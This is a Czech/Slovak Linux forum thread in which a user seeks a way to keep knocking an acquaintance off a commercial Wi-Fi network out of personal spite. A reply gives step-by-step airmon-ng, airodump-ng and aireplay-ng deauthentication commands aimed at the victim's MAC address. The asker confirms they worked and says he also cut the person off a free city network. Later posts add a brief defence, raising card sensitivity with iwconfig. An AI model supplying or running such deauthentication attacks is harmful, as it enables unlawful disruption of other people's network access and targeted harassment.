BackTrack 5 Linux deauth útok na MAC adresu

Zde vkládejte odkazy na zajímavé tutoriály nebo dokumentační projekty, videa atd.
Odpovědět
Uživatelský avatar
brambora
Level 0
Příspěvky: 7
Registrován: 29 srp 2011, 12:42

27 kvě 2012, 18:32

Zdravim, nevite někdo zda je v Backtrack 5 Linux nějaka aplikace která by opakovaně vysílalá deuth rámce na MAC adresu kterou určií? Dik za info..

Uživatelský avatar
brambora
Level 0
Příspěvky: 7
Registrován: 29 srp 2011, 12:42

02 čer 2012, 20:23

Děkuji všem odbornikum za radu, je videt ze zde prevazujou otazky nad odpovedema.. cimz chci rict ze to neni na dve veci ale jen na jednu.. Tecky si doplnte...

Uživatelský avatar
menom
Level 6
Příspěvky: 170
Registrován: 29 zář 2011, 00:37

03 čer 2012, 09:30

Možno je to tým, že to čo píšeš sa dá chápať viacerými spôsobmi.
opakovaně vysílalá deuth rámce
Myslíš Deauth pakety, ktoré slúžia na pokus odpojiť Klienta od Access Pointu ?


A tu malo byť na konci "m" ?
na MAC adresu kterou určií
Teda "určím-TY" alebo "určií-program vyberie cieľ (target) ?

Uživatelský avatar
brambora
Level 0
Příspěvky: 7
Registrován: 29 srp 2011, 12:42

03 čer 2012, 12:30

promin, ano myslel jsem urcim.. tzn je tam nasledujici problem. pripojny bod je kvalitni, je to komercni wifi placena. driv sem ji mel ja. zaplatil sem 2500kc a pouzival. pak jsem sehnal zdarma pripojeni od sveho sefa 5 krat rychlejsi, tak uz jsem prestal platit a nepouzival to. admin to ale stale nechal funkcni. znamemu jsem proto toto pripojeni prenechal a on ho ted pouziva asi rok. ze znameho se ale vyklubal lhar a podvodnik a chci mu to pripojeni zrusit. situace je nyni takova, ze mu to rusim tak ze jeden ntb mam stale pripojenej a vysilam packety, takze mu to pripojeni rusi, protoze zahlasi duplikat.. ale i kdyz to rusi protoze jsou stejne ip adresy tak s horecnym usilim se pripoji. hledam neco efektivnejsiho a co me napadlo je pres backtrack 5 v promiskuit modu deuth ramec, ale potreboval bych aby se vysilal furt.. nebo proste jine reseni. znam jeho mac adresu, jeho Ip adresu a k bodu mam pripojeni. diky.

Uživatelský avatar
menom
Level 6
Příspěvky: 170
Registrován: 29 zář 2011, 00:37

03 čer 2012, 13:12

Teoreticky to môžeš urobiť takto:
Spusti airmon-ng v termináli:

Kód: Vybrat vše

airmon-ng
a to čo bude pod Interface píš namiesto môjho wlan0

a,vypneš wifi (píšem o vstavanej karte v notebooku napríklad wlan0)

Kód: Vybrat vše

ifconfig wlan0 down
b,prepneš wifi do monitor mode

Kód: Vybrat vše

airmon-ng start wlan0
c,zapneš airodump-ng

Kód: Vybrat vše

airodump-ng wlan0
d,pozrieš MAC AP a MAC klienta a na ktorom kanáli vysiela,
e,stlačíš ctrl+c čím zastavíš airodump-ng a naladíš ho na kanál AP napríklad 6

Kód: Vybrat vše

airodump-ng -c 6 wlan0
f,otvoríš druhý terminál a pustíš aireplay-ng

Kód: Vybrat vše

aireplay-ng -0 5 -a 11:22:33:44:55:66 -c 77:88:99:55:44:33 wlan0
za -a píš MAC AP daľej za -c píš MAC klienta ktorého chceš odpojiť.
Namiesto čísla 5 môžeš dať 100 a namiesto 5 paketov odošle 100, alebo dáš viac a pôjde to dlhšie.

Uživatelský avatar
Stealth
Level 5
Příspěvky: 127
Registrován: 18 bře 2009, 17:40

03 čer 2012, 14:36

Ako je ďaleko tá druhá stanica?
Ak pracuje komerčné wifi podľa 802.11w, tak máš s DeAUTH smolu.

Uživatelský avatar
brambora
Level 0
Příspěvky: 7
Registrován: 29 srp 2011, 12:42

03 čer 2012, 20:57

Velké díky, seš zlatej,takhle kdyby jako ty se chovali všichni, tak bude na světě lépe :-) Fungovalo to napoprvé, ještě sem si musel pohrát s Wiresharkem abych zjistil jeho druhou MAC adresu a blokl mu i přístup na síť co je od mesta zadarmo. Je to šmejd tak at si konektivitu platí, peněz má dost. Ještě jednou dík

Uživatelský avatar
brambora
Level 0
Příspěvky: 7
Registrován: 29 srp 2011, 12:42

03 čer 2012, 20:59

v pohode to jede,zhruba 300metru..

Stealth píše:Ako je ďaleko tá druhá stanica?
Ak pracuje komerčné wifi podľa 802.11w, tak máš s DeAUTH smolu.

Uživatelský avatar
brambora
Level 0
Příspěvky: 7
Registrován: 29 srp 2011, 12:42

03 čer 2012, 21:14

Jinak doporučuji, pro ostatní kteří budou rešit něco podobného, použít pri deauth rámci zároveň i Wireshark v modu mono a sledovat zda si nezmění MAC adresu
brambora píše:promin, ano myslel jsem urcim.. tzn je tam nasledujici problem. pripojny bod je kvalitni, je to komercni wifi placena. driv sem ji mel ja. zaplatil sem 2500kc a pouzival. pak jsem sehnal zdarma pripojeni od sveho sefa 5 krat rychlejsi, tak uz jsem prestal platit a nepouzival to. admin to ale stale nechal funkcni. znamemu jsem proto toto pripojeni prenechal a on ho ted pouziva asi rok. ze znameho se ale vyklubal lhar a podvodnik a chci mu to pripojeni zrusit. situace je nyni takova, ze mu to rusim tak ze jeden ntb mam stale pripojenej a vysilam packety, takze mu to pripojeni rusi, protoze zahlasi duplikat.. ale i kdyz to rusi protoze jsou stejne ip adresy tak s horecnym usilim se pripoji. hledam neco efektivnejsiho a co me napadlo je pres backtrack 5 v promiskuit modu deuth ramec, ale potreboval bych aby se vysilal furt.. nebo proste jine reseni. znam jeho mac adresu, jeho Ip adresu a k bodu mam pripojeni. diky.

Uživatelský avatar
Stealth
Level 5
Příspěvky: 127
Registrován: 18 bře 2009, 17:40

05 čer 2012, 22:17

Ak by niekto potreboval obranu proti takémuto typu útoku, tak často stačí zdvihnuť úroveň sensitivity na karte.

Uživatelský avatar
unknown538
Level 0
Příspěvky: 15
Registrován: 24 kvě 2012, 04:49

06 čer 2012, 04:04

a jak toho dosahnu ?

Uživatelský avatar
wire
Level 8
Příspěvky: 696
Registrován: 15 kvě 2007, 22:44
Bydliště: Praha

13 kvě 2013, 19:34

unknown538 pomocí příkazu iwconfig. Lepší "krabičky" (RouterBoard) to umí zohlednit přímo v konfiguraci dle zvolených parametrů..

Kód: Vybrat vše

iwconfig wlan1 sens -80

Odpovědět
  • Podobná témata
    Odpovědi
    Zobrazení
    Poslední příspěvek
  • Informace
  • Kdo je online

    Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 1 host